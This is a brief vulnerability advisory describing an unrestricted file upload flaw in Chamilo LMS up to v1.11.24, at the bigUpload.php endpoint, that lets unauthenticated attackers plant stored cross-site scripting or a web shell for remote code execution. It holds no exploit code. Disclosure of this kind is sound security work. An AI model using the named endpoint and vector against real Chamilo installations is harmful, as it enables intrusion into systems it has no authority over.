Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.

Tag

#apple